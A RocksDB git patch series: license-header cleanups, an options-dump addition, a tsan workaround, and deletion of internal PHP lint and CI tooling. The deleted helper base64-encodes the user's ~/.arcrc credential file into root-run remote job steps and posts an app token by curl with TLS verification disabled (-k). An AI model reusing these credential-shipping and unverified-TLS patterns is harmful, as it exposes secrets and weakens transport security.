COPYING file in the root directory) and Apache 2.0 License diff --git a/db/convenience.cc b/db/convenience.cc index cc5d9524839..6568b1ffff3 100644 --- a/db/convenience.cc +++ b/db/convenience.cc @@ -3,9 +3,6 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). // -// Copyright (c) 2012 Facebook. -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. #ifndef ROCKSDB_LITE diff --git a/db/db_filesnapshot.cc b/db/db_filesnapshot.cc index 24ddd4af4ef..e266bf1ae1f 100644 --- a/db/db_filesnapshot.cc +++ b/db/db_filesnapshot.cc @@ -3,9 +3,6 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). // -// Copyright (c) 2012 Facebook. -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. #ifndef ROCKSDB_LITE diff --git a/db/plain_table_db_test.cc b/db/plain_table_db_test.cc index 9ce50f28f69..0b60332e53a 100644 --- a/db/plain_table_db_test.cc +++ b/db/plain_table_db_test.cc @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/table/mock_table.cc b/table/mock_table.cc index 7a2058bf9ec..4c9907e4599 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/table/mock_table.h b/table/mock_table.h index 0583139c6bf..9e5396341c5 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License From ecff9d5e33a25377caacbf6fc8d4c1fe2664ab91 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 18 Jul 2017 12:40:17 -0700 Subject: [PATCH 015/205] Include write_buffer_manager in ImmutableDBOptions::Dump Summary: as titled Closes https://github.com/facebook/rocksdb/pull/2601 Differential Revision: D5441618 Pulled By: ajkr fbshipit-source-id: 334b098d90caadd3d07167d051cfb4ae65db98e1 --- options/db_options.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/options/db_options.cc b/options/db_options.cc index 2a7860450cc..61775757d54 100644 --- a/options/db_options.cc +++ b/options/db_options.cc @@ -162,6 +162,8 @@ void ImmutableDBOptions::Dump(Logger* log) const { ROCKS_LOG_HEADER( log, " Options.db_write_buffer_size: %" ROCKSDB_PRIszt, db_write_buffer_size); + ROCKS_LOG_HEADER(log, " Options.write_buffer_manager: %p", + write_buffer_manager.get()); ROCKS_LOG_HEADER(log, " Options.access_hint_on_compaction_start: %d", static_cast(access_hint_on_compaction_start)); ROCKS_LOG_HEADER(log, " Options.new_table_reader_for_compaction_inputs: %d", From 6e3ee015fb1ce03e47838e9a3995410ce884c212 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Tue, 18 Jul 2017 12:58:57 -0700 Subject: [PATCH 016/205] Update java/rocksjni.pom Summary: Closes https://github.com/facebook/rocksdb/pull/2610 Differential Revision: D5445705 Pulled By: siying fbshipit-source-id: d5f97ffdf5bc18b853c3a106755aca96a650e428 --- java/rocksjni.pom | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/java/rocksjni.pom b/java/rocksjni.pom index 9d95875e6a6..94f07551c36 100644 --- a/java/rocksjni.pom +++ b/java/rocksjni.pom @@ -19,6 +19,11 @@ http://www.apache.org/licenses/LICENSE-2.0.html repo + + GNU General Public License, version 2 + http://www.gnu.org/licenses/gpl-2.0.html + repo + scm:git:git://github.com/dropwizard/metrics.git From 36651d14eeefaa3b17740e70bceacb3e096fde1a Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 18 Jul 2017 16:49:57 -0700 Subject: [PATCH 017/205] Moving static AdaptationContext to outside function Summary: Moving static AdaptationContext to outside function to bypass tsan's false report with static initializers. It is because with optimization enabled std::atomic is simplified to as a simple read with no locks. The existing lock produced by static initializer is __cxa_guard_acquire which is apparently not understood by tsan as it is different from normal locks (__gthrw_pthread_mutex_lock). This is a known problem with tsan: https://stackoverflow.com/questions/27464190/gccs-tsan-reports-a-data-race-with-a-thread-safe-static-local https://stackoverflow.com/questions/42062557/c-multithreading-is-initialization-of-a-local-static-lambda-thread-safe A workaround that I tried was to move the static variable outside the function. It is not a good coding practice since it gives global visibility to variable but it is a hackish workaround until g++ tsan is improved. Closes https://github.com/facebook/rocksdb/pull/2598 Differential Revision: D5445281 Pulled By: yiwu-arbug fbshipit-source-id: 6142bd934eb5852d8fd7ce027af593ba697ed41d --- db/write_thread.cc | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/db/write_thread.cc b/db/write_thread.cc index 022f4e64695..7063469967b 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -267,8 +267,8 @@ void WriteThread::CompleteFollower(Writer* w, WriteGroup& write_group) { SetState(w, STATE_COMPLETED); } +static WriteThread::AdaptationContext jbg_ctx("JoinBatchGroup"); void WriteThread::JoinBatchGroup(Writer* w) { - static AdaptationContext ctx("JoinBatchGroup"); assert(w->batch != nullptr); bool linked_as_leader = LinkOne(w, &newest_writer_); @@ -294,7 +294,7 @@ void WriteThread::JoinBatchGroup(Writer* w) { */ AwaitState(w, STATE_GROUP_LEADER | STATE_MEMTABLE_WRITER_LEADER | STATE_PARALLEL_MEMTABLE_WRITER | STATE_COMPLETED, - &ctx); + &jbg_ctx); TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:DoneWaiting", w); } } @@ -473,9 +473,9 @@ void WriteThread::LaunchParallelMemTableWriters(WriteGroup* write_group) { } } +static WriteThread::AdaptationContext cpmtw_ctx("CompleteParallelMemTableWriter"); // This method is called by both the leader and parallel followers bool WriteThread::CompleteParallelMemTableWriter(Writer* w) { - static AdaptationContext ctx("CompleteParallelMemTableWriter"); auto* write_group = w->write_group; if (!w->status.ok()) { @@ -485,7 +485,7 @@ bool WriteThread::CompleteParallelMemTableWriter(Writer* w) { if (write_group->running-- > 1) { // we're not the last one - AwaitState(w, STATE_COMPLETED, &ctx); + AwaitState(w, STATE_COMPLETED, &cpmtw_ctx); return false; } // else we're the last parallel worker and should perform exit duties. @@ -504,9 +504,9 @@ void WriteThread::ExitAsBatchGroupFollower(Writer* w) { SetState(write_group->leader, STATE_COMPLETED); } +static WriteThread::AdaptationContext eabgl_ctx("ExitAsBatchGroupLeader"); void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group, Status status) { - static AdaptationContext ctx("ExitAsBatchGroupLeader"); Writer* leader = write_group.leader; Writer* last_writer = write_group.last_writer; assert(leader->link_older == nullptr); @@ -544,7 +544,7 @@ void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group, } AwaitState(leader, STATE_MEMTABLE_WRITER_LEADER | STATE_PARALLEL_MEMTABLE_WRITER | STATE_COMPLETED, - &ctx); + &eabgl_ctx); } else { Writer* head = newest_writer_.load(std::memory_order_acquire); if (head != last_writer || @@ -591,15 +591,15 @@ void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group, } } +static WriteThread::AdaptationContext eu_ctx("EnterUnbatched"); void WriteThread::EnterUnbatched(Writer* w, InstrumentedMutex* mu) { - static AdaptationContext ctx("EnterUnbatched"); assert(w != nullptr && w->batch == nullptr); mu->Unlock(); bool linked_as_leader = LinkOne(w, &newest_writer_); if (!linked_as_leader) { TEST_SYNC_POINT("WriteThread::EnterUnbatched:Wait"); // Last leader will not pick us as a follower since our batch is nullptr - AwaitState(w, STATE_GROUP_LEADER, &ctx); + AwaitState(w, STATE_GROUP_LEADER, &eu_ctx); } if (enable_pipelined_write_) { WaitForMemTableWriters(); @@ -619,15 +619,15 @@ void WriteThread::ExitUnbatched(Writer* w) { } } +static WriteThread::AdaptationContext wfmw_ctx("WaitForMemTableWriters"); void WriteThread::WaitForMemTableWriters() { - static AdaptationContext ctx("WaitForMemTableWriters"); assert(enable_pipelined_write_); if (newest_memtable_writer_.load() == nullptr) { return; } Writer w; if (!LinkOne(&w, &newest_memtable_writer_)) { - AwaitState(&w, STATE_MEMTABLE_WRITER_LEADER, &ctx); + AwaitState(&w, STATE_MEMTABLE_WRITER_LEADER, &wfmw_ctx); } newest_memtable_writer_.store(nullptr); } From 3e6e863b1f58cdd98272ff7e3c8460ca212c9fa1 Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Fri, 14 Jul 2017 11:02:51 -0700 Subject: [PATCH 018/205] Remove arcanist_util directory --- arcanist_util/INTERNAL_ONLY_DIR | 2 + arcanist_util/__phutil_library_init__.php | 3 - arcanist_util/__phutil_library_map__.php | 71 - .../config/FacebookArcanistConfiguration.php | 43 - .../FacebookOldArcanistConfiguration.php | 43 - arcanist_util/config/RocksDBCommonHelper.php | 355 -- .../cpp_linter/ArcanistCpplintLinter.php | 88 - .../BaseDirectoryScopedFormatLinter.php | 74 - .../cpp_linter/FacebookHowtoevenLinter.php | 223 - .../cpp_linter/FbcodeClangFormatLinter.php | 58 - arcanist_util/cpp_linter/FbcodeCppLinter.php | 126 - arcanist_util/cpp_linter/cpplint.py | 4767 ----------------- .../lint_engine/FacebookFbcodeLintEngine.php | 138 - .../FacebookHowtoevenLintEngine.php | 27 - .../FacebookFbcodeUnitTestEngine.php | 17 - .../FacebookOldFbcodeUnitTestEngine.php | 17 - 16 files changed, 2 insertions(+), 6050 deletions(-) create mode 100644 arcanist_util/INTERNAL_ONLY_DIR delete mode 100644 arcanist_util/__phutil_library_init__.php delete mode 100644 arcanist_util/__phutil_library_map__.php delete mode 100644 arcanist_util/config/FacebookArcanistConfiguration.php delete mode 100644 arcanist_util/config/FacebookOldArcanistConfiguration.php delete mode 100644 arcanist_util/config/RocksDBCommonHelper.php delete mode 100644 arcanist_util/cpp_linter/ArcanistCpplintLinter.php delete mode 100644 arcanist_util/cpp_linter/BaseDirectoryScopedFormatLinter.php delete mode 100644 arcanist_util/cpp_linter/FacebookHowtoevenLinter.php delete mode 100644 arcanist_util/cpp_linter/FbcodeClangFormatLinter.php delete mode 100644 arcanist_util/cpp_linter/FbcodeCppLinter.php delete mode 100755 arcanist_util/cpp_linter/cpplint.py delete mode 100644 arcanist_util/lint_engine/FacebookFbcodeLintEngine.php delete mode 100644 arcanist_util/lint_engine/FacebookHowtoevenLintEngine.php delete mode 100644 arcanist_util/unit_engine/FacebookFbcodeUnitTestEngine.php delete mode 100644 arcanist_util/unit_engine/FacebookOldFbcodeUnitTestEngine.php diff --git a/arcanist_util/INTERNAL_ONLY_DIR b/arcanist_util/INTERNAL_ONLY_DIR new file mode 100644 index 00000000000..e55aa3bdfe3 --- /dev/null +++ b/arcanist_util/INTERNAL_ONLY_DIR @@ -0,0 +1,2 @@ +arcanist_util are only used internaly, If you want to change it please check +/arcanist_util diff --git a/arcanist_util/__phutil_library_init__.php b/arcanist_util/__phutil_library_init__.php deleted file mode 100644 index bc732cad60a..00000000000 --- a/arcanist_util/__phutil_library_init__.php +++ /dev/null @@ -1,3 +0,0 @@ - 2, - 'class' => - array( - 'ArcanistCpplintLinter' => 'cpp_linter/ArcanistCpplintLinter.php', - 'BaseDirectoryScopedFormatLinter' => 'cpp_linter/BaseDirectoryScopedFormatLinter.php', - 'FacebookArcanistConfiguration' => 'config/FacebookArcanistConfiguration.php', - 'FacebookFbcodeLintEngine' => 'lint_engine/FacebookFbcodeLintEngine.php', - 'FacebookFbcodeUnitTestEngine' => 'unit_engine/FacebookFbcodeUnitTestEngine.php', - 'FacebookHowtoevenLintEngine' => 'lint_engine/FacebookHowtoevenLintEngine.php', - 'FacebookHowtoevenLinter' => 'cpp_linter/FacebookHowtoevenLinter.php', - 'FbcodeClangFormatLinter' => 'cpp_linter/FbcodeClangFormatLinter.php', - 'FbcodeCppLinter' => 'cpp_linter/FbcodeCppLinter.php', - ), - 'function' => - array( - ), - 'xmap' => - array( - 'ArcanistCpplintLinter' => 'ArcanistLinter', - 'BaseDirectoryScopedFormatLinter' => 'ArcanistLinter', - 'FacebookArcanistConfiguration' => 'ArcanistConfiguration', - 'FacebookFbcodeLintEngine' => 'ArcanistLintEngine', - 'FacebookFbcodeUnitTestEngine' => 'ArcanistBaseUnitTestEngine', - 'FacebookHowtoevenLintEngine' => 'ArcanistLintEngine', - 'FacebookHowtoevenLinter' => 'ArcanistLinter', - 'FbcodeClangFormatLinter' => 'BaseDirectoryScopedFormatLinter', - 'FbcodeCppLinter' => 'ArcanistLinter', - ), - )); -} else { - phutil_register_library_map(array( - '__library_version__' => 2, - 'class' => - array( - 'ArcanistCpplintLinter' => 'cpp_linter/ArcanistCpplintLinter.php', - 'BaseDirectoryScopedFormatLinter' => 'cpp_linter/BaseDirectoryScopedFormatLinter.php', - 'FacebookArcanistConfiguration' => 'config/FacebookOldArcanistConfiguration.php', - 'FacebookFbcodeLintEngine' => 'lint_engine/FacebookFbcodeLintEngine.php', - 'FacebookFbcodeUnitTestEngine' => 'unit_engine/FacebookOldFbcodeUnitTestEngine.php', - 'FacebookHowtoevenLintEngine' => 'lint_engine/FacebookHowtoevenLintEngine.php', - 'FacebookHowtoevenLinter' => 'cpp_linter/FacebookHowtoevenLinter.php', - 'FbcodeClangFormatLinter' => 'cpp_linter/FbcodeClangFormatLinter.php', - 'FbcodeCppLinter' => 'cpp_linter/FbcodeCppLinter.php', - ), - 'function' => - array( - ), - 'xmap' => - array( - 'ArcanistCpplintLinter' => 'ArcanistLinter', - 'BaseDirectoryScopedFormatLinter' => 'ArcanistLinter', - 'FacebookArcanistConfiguration' => 'ArcanistConfiguration', - 'FacebookFbcodeLintEngine' => 'ArcanistLintEngine', - 'FacebookFbcodeUnitTestEngine' => 'ArcanistBaseUnitTestEngine', - 'FacebookHowtoevenLintEngine' => 'ArcanistLintEngine', - 'FacebookHowtoevenLinter' => 'ArcanistLinter', - 'FbcodeClangFormatLinter' => 'BaseDirectoryScopedFormatLinter', - 'FbcodeCppLinter' => 'ArcanistLinter', - ), - )); -} diff --git a/arcanist_util/config/FacebookArcanistConfiguration.php b/arcanist_util/config/FacebookArcanistConfiguration.php deleted file mode 100644 index 3d06fc5b521..00000000000 --- a/arcanist_util/config/FacebookArcanistConfiguration.php +++ /dev/null @@ -1,43 +0,0 @@ - array('help' => 'Just to make tools happy')); - } - return array(); - } - - public function didRunWorkflow($command, - ArcanistWorkflow $workflow, - $error_code) { - // Default options don't terminate on failure, but that's what we want. In - // the current case we use assertions intentionally as "terminate on failure - // invariants". - assert_options(ASSERT_BAIL, true); - - assert($workflow); - assert(strlen($command) > 0); - - if ($command == DIFF_COMMAND && !$workflow->isRawDiffSource()) { - $diffID = $workflow->getDiffId(); - - // When submitting a diff this code path gets executed multiple times in - // a row. We only care about the case when ID for the diff is provided - // because that's what we need to apply the diff and trigger the tests. - if (strlen($diffID) > 0) { - assert(is_numeric($diffID)); - startTestsInSandcastle(true /* $applyDiff */, $workflow, $diffID); - } - } - } -} diff --git a/arcanist_util/config/FacebookOldArcanistConfiguration.php b/arcanist_util/config/FacebookOldArcanistConfiguration.php deleted file mode 100644 index 93515cc13fe..00000000000 --- a/arcanist_util/config/FacebookOldArcanistConfiguration.php +++ /dev/null @@ -1,43 +0,0 @@ - array('help' => 'Just to make tools happy')); - } - return array(); - } - - public function didRunWorkflow($command, - ArcanistBaseWorkflow $workflow, - $error_code) { - // Default options don't terminate on failure, but that's what we want. In - // the current case we use assertions intentionally as "terminate on failure - // invariants". - assert_options(ASSERT_BAIL, true); - - assert($workflow); - assert(strlen($command) > 0); - - if ($command == DIFF_COMMAND && !$workflow->isRawDiffSource()) { - $diffID = $workflow->getDiffId(); - - // When submitting a diff this code path gets executed multiple times in - // a row. We only care about the case when ID for the diff is provided - // because that's what we need to apply the diff and trigger the tests. - if (strlen($diffID) > 0) { - assert(is_numeric($diffID)); - startTestsInSandcastle(true /* $applyDiff */, $workflow, $diffID); - } - } - } -} diff --git a/arcanist_util/config/RocksDBCommonHelper.php b/arcanist_util/config/RocksDBCommonHelper.php deleted file mode 100644 index de40cc78c3f..00000000000 --- a/arcanist_util/config/RocksDBCommonHelper.php +++ /dev/null @@ -1,355 +0,0 @@ - 0); - assert(is_numeric($diffID)); - assert(strlen($url) > 0); - - $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' - . '"name":"click here for sandcastle tests for D' . $diffID . '", ' - . '"link":"' . $url . '"}\' | ' - . 'arc call-conduit ' - . 'differential.updateunitresults'; - shell_exec($cmd); -} - -function buildUpdateTestStatusCmd($diffID, $test, $status) { - assert(strlen($diffID) > 0); - assert(is_numeric($diffID)); - assert(strlen($test) > 0); - assert(strlen($status) > 0); - - $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' - . '"name":"' . $test . '", ' - . '"result":"' . $status . '"}\' | ' - . 'arc call-conduit ' - . 'differential.updateunitresults'; - return $cmd; -} - -function updateTestStatus($diffID, $test) { - assert(strlen($diffID) > 0); - assert(is_numeric($diffID)); - assert(strlen($test) > 0); - - shell_exec(buildUpdateTestStatusCmd($diffID, $test, "waiting")); -} - -function getSteps($applyDiff, $diffID, $username, $test) { - assert(strlen($username) > 0); - assert(strlen($test) > 0); - - if ($applyDiff) { - assert(strlen($diffID) > 0); - assert(is_numeric($diffID)); - - $arcrc_content = (PHP_OS == "Darwin" ? - exec("cat ~/.arcrc | gzip -f | base64") : - exec("cat ~/.arcrc | gzip -f | base64 -w0")); - assert(strlen($arcrc_content) > 0); - - // Sandcastle machines don't have arc setup. We copy the user certificate - // and authenticate using that in Sandcastle. - $setup = array( - "name" => "Setup arcrc", - "shell" => "echo " . $arcrc_content . " | base64 --decode" - . " | gzip -d > ~/.arcrc", - "user" => "root" - ); - - // arc demands certain permission on its config. - // also fix the sticky bit issue in sandcastle - $fix_permission = array( - "name" => "Fix environment", - "shell" => "chmod 600 ~/.arcrc && chmod +t /dev/shm", - "user" => "root" - ); - - // Construct the steps in the order of execution. - $steps[] = $setup; - $steps[] = $fix_permission; - } - - // fbcode is a sub-repo. We cannot patch until we add it to ignore otherwise - // Git thinks it is an uncommited change. - $fix_git_ignore = array( - "name" => "Fix git ignore", - "shell" => "echo fbcode >> .git/info/exclude", - "user" => "root" - ); - - $steps[] = $fix_git_ignore; - - // This will be the command used to execute particular type of tests. - $cmd = ""; - - if ($applyDiff) { - // Patch the code (keep your fingures crossed). - $patch = array( - "name" => "Patch " . $diffID, - "shell" => "arc --arcrc-file ~/.arcrc " - . "patch --nocommit --diff " . $diffID, - "user" => "root" - ); - - $steps[] = $patch; - - updateTestStatus($diffID, $test); - $cmd = buildUpdateTestStatusCmd($diffID, $test, "running") . "; "; - } - - // Run the actual command. - $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " . $test - . "; exit_code=$?; "; - - if ($applyDiff) { - $cmd = $cmd . "([[ \$exit_code -eq 0 ]] &&" - . buildUpdateTestStatusCmd($diffID, $test, "pass") . ")" - . "||" . buildUpdateTestStatusCmd($diffID, $test, "fail") - . "; "; - } - - // shell command to sort the tests based on exit code and print - // the output of the log files. - $cat_sorted_logs = " - while read code log_file; - do echo \"################ cat \$log_file [exit_code : \$code] ################\"; - cat \$log_file; - done < <(tail -n +2 LOG | sort -k7,7n -k4,4gr | awk '{print \$7,\$NF}')"; - - // Shell command to cat all log files - $cat_all_logs = "for f in `ls t/!(run-*)`; do echo \$f;cat \$f; done"; - - // If LOG file exist use it to cat log files sorted by exit code, otherwise - // cat everything - $logs_cmd = "if [ -f LOG ]; then {$cat_sorted_logs}; else {$cat_all_logs}; fi"; - - $cmd = $cmd . " cat /tmp/precommit-check.log" - . "; shopt -s extglob; {$logs_cmd}" - . "; shopt -u extglob; [[ \$exit_code -eq 0 ]]"; - assert(strlen($cmd) > 0); - - $run_test = array( - "name" => "Run " . $test, - "shell" => $cmd, - "user" => "root", - "parser" => "python build_tools/error_filter.py " . $test, - ); - - $steps[] = $run_test; - - if ($applyDiff) { - // Clean up the user arc config we are using. - $cleanup = array( - "name" => "Arc cleanup", - "shell" => "rm -f ~/.arcrc", - "user" => "root" - ); - - $steps[] = $cleanup; - } - - assert(count($steps) > 0); - return $steps; -} - -function getSandcastleConfig() { - $sandcastle_config = array(); - - $cwd = getcwd(); - $cwd_token_file = "{$cwd}/.sandcastle"; - // This is a case when we're executed from a continuous run. Fetch the values - // from the environment. - if (getenv(ENV_POST_RECEIVE_HOOK)) { - $sandcastle_config[0] = getenv(ENV_HTTPS_APP_VALUE); - $sandcastle_config[1] = getenv(ENV_HTTPS_TOKEN_VALUE); - } else { - // This is a typical `[p]arc diff` case. Fetch the values from the specific - // configuration files. - for ($i = 0; $i < 50; $i++) { - if (file_exists(PRIMARY_TOKEN_FILE) || - file_exists($cwd_token_file)) { - break; - } - // If we failed to fetch the tokens, sleep for 0.2 second and try again - usleep(200000); - } - assert(file_exists(PRIMARY_TOKEN_FILE) || - file_exists($cwd_token_file)); - - // Try the primary location first, followed by a secondary. - if (file_exists(PRIMARY_TOKEN_FILE)) { - $cmd = 'cat ' . PRIMARY_TOKEN_FILE; - } else { - $cmd = 'cat ' . $cwd_token_file; - } - - assert(strlen($cmd) > 0); - $sandcastle_config = explode(':', rtrim(shell_exec($cmd))); - } - - // In this case be very explicit about the implications. - if (count($sandcastle_config) != 2) { - echo "Sandcastle configuration files don't contain valid information " . - "or the necessary environment variables aren't defined. Unable " . - "to validate the code changes."; - exit(1); - } - - assert(strlen($sandcastle_config[0]) > 0); - assert(strlen($sandcastle_config[1]) > 0); - assert(count($sandcastle_config) > 0); - - return $sandcastle_config; -} - -// This function can be called either from `[p]arc diff` command or during -// the Git post-receive hook. - function startTestsInSandcastle($applyDiff, $workflow, $diffID) { - // Default options don't terminate on failure, but that's what we want. In - // the current case we use assertions intentionally as "terminate on failure - // invariants". - assert_options(ASSERT_BAIL, true); - - // In case of a diff we'll send notificatios to the author. Else it'll go to - // the entire team because failures indicate that build quality has regressed. - $username = $applyDiff ? exec("whoami") : CONT_RUN_ALIAS; - assert(strlen($username) > 0); - - if ($applyDiff) { - assert($workflow); - assert(strlen($diffID) > 0); - assert(is_numeric($diffID)); - } - - // List of tests we want to run in Sandcastle. - $tests = array("unit", "unit_non_shm", "unit_481", "clang_unit", "tsan", - "asan", "lite_test", "valgrind", "release", "release_481", - "clang_release", "punit", "clang_analyze", "code_cov", - "java_build", "no_compression", "unity", "ubsan"); - - $send_email_template = array( - 'type' => 'email', - 'triggers' => array('fail'), - 'emails' => array($username . '@fb.com'), - ); - - // Construct a job definition for each test and add it to the master plan. - foreach ($tests as $test) { - $stepName = "RocksDB diff " . $diffID . " test " . $test; - - if (!$applyDiff) { - $stepName = "RocksDB continuous integration test " . $test; - } - - $arg[] = array( - "name" => $stepName, - "report" => array($send_email_template), - "steps" => getSteps($applyDiff, $diffID, $username, $test) - ); - } - - // We cannot submit the parallel execution master plan to Sandcastle and - // need supply the job plan as a determinator. So we construct a small job - // that will spit out the master job plan which Sandcastle will parse and - // execute. Why compress the job definitions? Otherwise we run over the max - // string size. - $cmd = "echo " . base64_encode(json_encode($arg)) - . (PHP_OS == "Darwin" ? - " | gzip -f | base64" : - " | gzip -f | base64 -w0"); - assert(strlen($cmd) > 0); - - $arg_encoded = shell_exec($cmd); - assert(strlen($arg_encoded) > 0); - - $runName = "Run diff " . $diffID . "for user " . $username; - - if (!$applyDiff) { - $runName = "RocksDB continuous integration build and test run"; - } - - $command = array( - "name" => $runName, - "steps" => array() - ); - - $command["steps"][] = array( - "name" => "Generate determinator", - "shell" => "echo " . $arg_encoded . " | base64 --decode | gzip -d" - . " | base64 --decode", - "determinator" => true, - "user" => "root" - ); - - // Submit to Sandcastle. - $url = 'https://interngraph.intern.facebook.com/sandcastle/create'; - - $job = array( - 'command' => 'SandcastleUniversalCommand', - 'args' => $command, - 'capabilities' => array( - 'vcs' => 'rocksdb-int-git', - 'type' => 'lego', - ), - 'hash' => 'origin/master', - 'user' => $username, - 'alias' => 'rocksdb-precommit', - 'tags' => array('rocksdb'), - 'description' => 'Rocksdb precommit job', - ); - - // Fetch the configuration necessary to submit a successful HTTPS request. - $sandcastle_config = getSandcastleConfig(); - - $app = $sandcastle_config[0]; - $token = $sandcastle_config[1]; - - $cmd = 'curl -s -k -F app=' . $app . ' ' - . '-F token=' . $token . ' -F job=\'' . json_encode($job) - .'\' "' . $url . '"'; - - $output = shell_exec($cmd); - assert(strlen($output) > 0); - - // Extract Sandcastle URL from the response. - preg_match('/url": "(.+)"/', $output, $sandcastle_url); - - assert(count($sandcastle_url) > 0, "Unable to submit Sandcastle request."); - assert(strlen($sandcastle_url[1]) > 0, "Unable to extract Sandcastle URL."); - - if ($applyDiff) { - echo "\nSandcastle URL: " . $sandcastle_url[1] . "\n"; - // Ask Phabricator to display it on the diff UI. - postURL($diffID, $sandcastle_url[1]); - } else { - echo "Continuous integration started Sandcastle tests. You can look at "; - echo "the progress at:\n" . $sandcastle_url[1] . "\n"; - } -} - -// Continuous run cript will set the environment variable and based on that -// we'll trigger the execution of tests in Sandcastle. In that case we don't -// need to apply any diffs and there's no associated workflow either. -if (getenv(ENV_POST_RECEIVE_HOOK)) { - startTestsInSandcastle( - false /* $applyDiff */, - NULL /* $workflow */, - NULL /* $diffID */); -} diff --git a/arcanist_util/cpp_linter/ArcanistCpplintLinter.php b/arcanist_util/cpp_linter/ArcanistCpplintLinter.php deleted file mode 100644 index b9c41375551..00000000000 --- a/arcanist_util/cpp_linter/ArcanistCpplintLinter.php +++ /dev/null @@ -1,88 +0,0 @@ -linterDir(), $bin); - if (!$err) { - return $this->linterDir().'/'.$bin; - } - - // Look for globally installed cpplint.py - list($err) = exec_manual('which %s', $bin); - if ($err) { - throw new ArcanistUsageException( - "cpplint.py does not appear to be installed on this system. Install ". - "it (e.g., with 'wget \"http://google-styleguide.googlecode.com/". - "svn/trunk/cpplint/cpplint.py\"') ". - "in your .arcconfig to point to the directory where it resides. ". - "Also don't forget to chmod a+x cpplint.py!"); - } - - return $bin; - } - - public function lintPath($path) { - $bin = $this->getLintPath(); - $path = $this->rocksdbDir().'/'.$path; - - $f = new ExecFuture("%C $path", $bin); - - list($err, $stdout, $stderr) = $f->resolve(); - - if ($err === 2) { - throw new Exception("cpplint failed to run correctly:\n".$stderr); - } - - $lines = explode("\n", $stderr); - $messages = array(); - foreach ($lines as $line) { - $line = trim($line); - $matches = null; - $regex = '/^[^:]+:(\d+):\s*(.*)\s*\[(.*)\] \[(\d+)\]$/'; - if (!preg_match($regex, $line, $matches)) { - continue; - } - foreach ($matches as $key => $match) { - $matches[$key] = trim($match); - } - $message = new ArcanistLintMessage(); - $message->setPath($path); - $message->setLine($matches[1]); - $message->setCode($matches[3]); - $message->setName($matches[3]); - $message->setDescription($matches[2]); - $message->setSeverity(ArcanistLintSeverity::SEVERITY_WARNING); - $this->addLintMessage($message); - } - } - - // The path of this linter - private function linterDir() { - return dirname(__FILE__); - } - - // TODO(kaili) a quick and dirty way to figure out rocksdb's root dir. - private function rocksdbDir() { - return $this->linterDir()."/../.."; - } -} diff --git a/arcanist_util/cpp_linter/BaseDirectoryScopedFormatLinter.php b/arcanist_util/cpp_linter/BaseDirectoryScopedFormatLinter.php deleted file mode 100644 index 4a7b307dc8a..00000000000 --- a/arcanist_util/cpp_linter/BaseDirectoryScopedFormatLinter.php +++ /dev/null @@ -1,74 +0,0 @@ -getPathsToLint() as $p) { - // check if $path starts with $p - if (strncmp($path, $p, strlen($p)) === 0) { - return true; - } - } - return false; - } - - // API to tell this linter which lines were changed - final public function setPathChangedLines($path, $changed) { - $this->changedLines[$path] = $changed; - } - - final public function willLintPaths(array $paths) { - $futures = array(); - foreach ($paths as $path) { - if (!$this->shouldLintPath($path)) { - continue; - } - - $changed = $this->changedLines[$path]; - if (!isset($changed)) { - // do not run linter if there are no changes - continue; - } - - $futures[$path] = $this->getFormatFuture($path, $changed); - } - - foreach (id(new FutureIterator($futures))->limit(8) as $p => $f) { - $this->rawLintOutput[$p] = $f->resolvex(); - } - } - - abstract protected function getFormatFuture($path, array $changed); - abstract protected function getLintMessage($diff); - - final public function lintPath($path) { - if (!isset($this->rawLintOutput[$path])) { - return; - } - - list($new_content) = $this->rawLintOutput[$path]; - $old_content = $this->getData($path); - - if ($new_content != $old_content) { - $diff = ArcanistDiffUtils::renderDifferences($old_content, $new_content); - $this->raiseLintAtOffset( - 0, - self::LINT_FORMATTING, - $this->getLintMessage($diff), - $old_content, - $new_content); - } - } - -} diff --git a/arcanist_util/cpp_linter/FacebookHowtoevenLinter.php b/arcanist_util/cpp_linter/FacebookHowtoevenLinter.php deleted file mode 100644 index 6edb114b669..00000000000 --- a/arcanist_util/cpp_linter/FacebookHowtoevenLinter.php +++ /dev/null @@ -1,223 +0,0 @@ -localExecx("rm -rf _build/_lint"); - - // Build compilation database. - $lintable_paths = $this->getLintablePaths($paths); - $interesting_paths = $this->getInterestingPaths($lintable_paths); - - if (!$lintable_paths) { - return; - } - - // Run lint. - try { - $this->localExecx( - "%C %C -p _build/dev/ %Ls", - $this->getBinaryPath(), - $this->getFilteredIssues(), - $lintable_paths); - } catch (CommandException $exception) { - PhutilConsole::getConsole()->writeErr($exception->getMessage()); - } - - // Load results. - $result = id( - 